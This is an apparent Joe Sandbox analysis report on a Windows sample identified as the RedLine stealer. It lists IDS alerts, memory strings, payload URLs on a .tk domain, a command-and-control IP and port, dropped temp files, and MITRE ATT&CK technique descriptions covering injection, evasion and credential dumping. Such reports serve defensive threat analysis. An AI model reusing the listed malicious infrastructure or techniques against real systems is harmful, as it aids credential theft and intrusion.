Instruction Fuzzy Hash: 1101F77101C388AAE7108A6DCDC4B67FB98EF45A64F08C66EEF045A247D3B59840CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 012CDA8C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.413890248.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_12cd000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eabe090a42f1f3f7fc4546a9a9042cb0f7b9d7d360802c81dbbe9c13550e62f
Instruction ID: f165810129488a7435e8453e58e1c4d3a68ea26da0a5214ebffb21705843f6f1
Opcode Fuzzy Hash: 9eabe090a42f1f3f7fc4546a9a9042cb0f7b9d7d360802c81dbbe9c13550e62f
Instruction Fuzzy Hash: C1F0C2724083849AEB118A1ECCC4B63FF98EB41634F18C55EEF485B286C3B99844CAB1

Uniqueness

Uniqueness Score: -1.00%

Source: https://tgc8x.tk/tt/BLACKDEV.txt	Avira URL Cloud: Label: phishing
Source: https://tgc8x.tk/tt/lamb.txt	Avira URL Cloud: Label: phishing

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00E442DC
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00E464DC
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00E45C60
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00E44300
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00E4610C
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00E44318

Source: Traffic	Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.4:49695
Source: Traffic	Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.4:49696
Source: Traffic	Snort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.4:56572 -> 8.8.8.8:53

Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.55.186.201:
Source: aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.55.186.201:6008
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.55.186.201:6008/
Source: aspnet_compiler.exe, 00000001.00000003.412663066.0000000008CB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412625368.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412575103.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.402236725.0000000008CA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412702825.000000000152D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: aspnet_compiler.exe, 00000001.00000002.416441450.000000000309B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415687042.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/t_
Source: StZAEFSb2j.exe, 00000000.00000002.320604810.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tgc8x.tk
Source: tmpE2D.tmp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpE2D.tmp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpE2D.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpE2D.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk
Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.318500513.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk/tt/BLACKDEV.txt
Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.318500513.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk/tt/lamb.txt
Source: StZAEFSb2j.exe, 00000000.00000002.320562361.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk4
Source: StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tkD8
Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201
Source: unknown	TCP traffic detected without corresponding DNS query: 194.55.186.201

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report StZAEFSb2j.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\StZAEFSb2j.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

C:\Users\user\AppData\Local\Temp\tmp1881.tmp

C:\Users\user\AppData\Local\Temp\tmp18B1.tmp

C:\Users\user\AppData\Local\Temp\tmp18B2.tmp

C:\Users\user\AppData\Local\Temp\tmp1920.tmp

C:\Users\user\AppData\Local\Temp\tmp1921.tmp

C:\Users\user\AppData\Local\Temp\tmp1951.tmp

C:\Users\user\AppData\Local\Temp\tmpA487.tmp

C:\Users\user\AppData\Local\Temp\tmpA4F5.tmp

C:\Users\user\AppData\Local\Temp\tmpB95.tmp

C:\Users\user\AppData\Local\Temp\tmpBF4.tmp

C:\Users\user\AppData\Local\Temp\tmpC33.tmp

C:\Users\user\AppData\Local\Temp\tmpC92.tmp

C:\Users\user\AppData\Local\Temp\tmpCC2.tmp

C:\Users\user\AppData\Local\Temp\tmpCF62.tmp

Windows Analysis Report
StZAEFSb2j.exe

Function 00E499F5 Relevance: 1.7, APIs: 1, Instructions: 239
processCOMMON

Function 00E49A00 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Function 00E4A0AC Relevance: 1.6, APIs: 1, Instructions: 113
injectionCOMMON

Function 00E4A0B0 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 00E466D8 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON